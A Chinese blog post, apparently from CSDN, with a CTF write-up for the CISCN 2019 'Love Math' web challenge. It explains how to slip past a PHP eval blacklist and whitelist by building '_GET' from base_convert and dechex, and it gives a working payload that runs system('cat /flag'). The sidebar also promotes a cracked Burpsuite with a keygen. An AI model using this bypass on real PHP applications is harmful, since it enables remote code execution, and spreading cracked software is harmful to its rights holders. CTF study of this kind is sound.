CISCN2019初赛 Love Math

最新推荐文章于 2023-09-01 17:19:55 发布
最新推荐文章于 2023-09-01 17:19:55 发布
阅读量287 收藏 1
点赞数
分类专栏: CTF 文章标签: php sql 网络安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45619909/article/details/115598257
版权

打开靶机

直接给了源码,刚开始没啥思路,看了wp,大致懂了。先介绍一个概念,在PHP中可以把函数名赋给变量,然后通过变量调用函数,比如下面的代码会执行system('ls');

$a='system';
$a('ls');

我想执行system('cat /flag');那就应该是如下语句

?c=$_GET[a]($_GET[b])&a=system&b=cat /flag

但是源码限制了许多东西:

1.payload长度不能超过80

2.payload中不能包含’ ‘, ‘\t’, ‘\r’, ‘\n’,’’’, ‘"’, ‘`’, ‘[’, ‘]’ 这些字符

3.payload中不能有不是$whitelist白名单里面的单词出现,比如

abs(1)能过
1abs()能过
absa()不能过
abs(a)不能过
abs()a不能过

这里看了wp的绕过方法,括号被禁用我们可以用花括号代替{},要构造的字符串为_GET,PHP中有将16进制转成字符串的函数hex2bin,那么hex2bin又怎么生成呢,这时就需要我们的base_convert函数了,36进制也就base36中有字母数字正好可以满足。所以 base_convert(37907361743,10,36)=hex2bin。因为我们是要得到_GET所以就得用到另外一个函数dechex将GET的10进制转为16进制再通过hex2bin转换为字符串
所以\_GET=base_convert(37907361743,10,36)(dechex(1598506324));

payload:

c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{pi}($$pi{abs})&pi=system&abs=cat /flag

如图,别忘了?

Tajang
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[CISCN 2019 初赛]Love Math
missht0的博客
01-27 1634
[CISCN 2019 初赛]Love Math <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $bla
CISCN 2019 初赛--Love Math
Oavinci的博客
07-28 594
参考了大佬WP,payload姿势太多了 https://www.cnblogs.com/20175211lyz/p/11588219.html https://blog.csdn.net/weixin_43940853/article/details/104332132 在线进制转换:https://tool.oschina.net/hexconvert 这里写几个自己复现成功的(太菜了我.. 源码,目的是读取flag <html> <meta ch...
[CISCN 2019 初赛]Love Math 1
qq_41889600的博客
11-29 161
buuctf [CISCN 2019 初赛]Love Math
【BUUCTF】[CISCN 2019 初赛]Love Math
aoao331198的博客
05-05 417
源码 <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $blacklist = [' ', '\t', '
[CISCN 2019初赛]Love Math
rev1ve的博客
09-01 1586
简单分析一下,只有一个GET传参参数是c,然后对上传的值进行黑名单检测,接着给了白名单以及常用的数学函数。这个提示很明显了,需要我们用函数进行转换成我们的执行命令。这里最后一个点,就是我们传递的参数值为两个(即一个是函数名 一个是参数),该如何绕过呢。这样的出来,但是这里对我们c的值进行了超多过滤,这里用的是构造出类似。呢,其实目的很明显,因为c的值不能有字母,而我们要想利用。解决方法是用php7的特性,就是可以用变量执行函数。关键点利用php动态函数的特性,比如我们可以构造。,这里需要用到的两个函数是。
[CISCN2019 初赛]Love Math
qq_42551635的博客
05-07 386
[CISCN2019 初赛]Love Math 前言 一道非常有意思的,逻辑比较简单的代码审计 知识点 base_convert()函数 in_array()函数 in_array(值,数组) 函数搜索数组中是否存在指定的值。 实例 <?php $people = array("Peter", "Joe", "Glenn", "Cleveland", 23); if (in_array("23", $people, TRUE)) { echo "Match found<br&
下载思科模拟器Cisco packet Tracer 8.2.2
最新发布
05-28
Cisco packet Tracer 8.2.2用于思科实验,练习使用。非常方便。
思科cisco实验内容练习.zip
09-25
思科模拟器各种设备练习,包含1.交换机的基本配置2.连接有线和无线配置3.第 3 层交换机4.路由器基本配置及排除i 5.pv4和ipv6编址6.子网划分7.服务器8.无线路由器9.扩展练习-.端口安全
思科仿真模拟器cisco packet tracer6.2
03-07
cisco packet tracer 6.2是由思科推出的一款仿真模拟器,主要用于思科各类设备的模拟学习操作,包括交换机、路由器的模拟,旨在帮助初学者进行各类网络的设计、配置、排除网络故障等,用户还可以在软件的图形用户...
Cisco思科交换机怎么初始化?
10-01
在IT行业中,Cisco思科交换机是网络基础设施的重要组成部分,尤其在企业级网络环境中广泛应用。本文将详细讲解如何初始化和配置Cisco思科交换机,帮助读者掌握基础操作。 首先,了解交换机的基本构造至关重要。...
思科MIB库 cisco mib库
10-14
标题中的“思科MIB库 cisco mib库”指的是思科公司为他们的网络设备提供的MIB资源集合。这些库包含了用于描述和访问思科交换机、路由器以及其他网络设备管理信息的结构化数据。 描述中的“思科V2MIB库”提及的是...
buuctf-[CISCN 2019 初赛]Love Math(小宇特详解)
小宇的web博客
02-26 2837
buuctf-[CISCN 2019 初赛]Love Math(小宇特详解) 1.先看题目 <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了
Burpsuite2020.12.1最新版蓝色款
Tajang的大千世界
12-22 9292
最新版Burpsuite下载破解安装 安装包链接:https://cloud.189.cn/t/qUVzYbuAJzqm(访问码:mw12) 1.首先,我们解压,可以看到解压后的文件夹里有如下文件 2.双击BURP.cmd,打开后需要输入key 3.我们打开BurpSuite KeyGen By Uncia.jar,将lisense里的码复制到刚才的burpsuite里 将lisense复制到burpsuite里点击next 4.我们可以看到下图: 5.点击Manual activation,显示下图: 6
超融合基础设施的未来:2019年魔力象限分析
报告可能包含了对市场主要供应商的分析,如 Nutanix、Dell EMC、VMware、Cisco 等,这些公司在HCI领域的竞争格局、产品特性、市场地位以及未来发展方向等方面可能都有详细阐述。 **评估标准** 通常,Gartner的魔力...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Tajang

感谢投喂

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值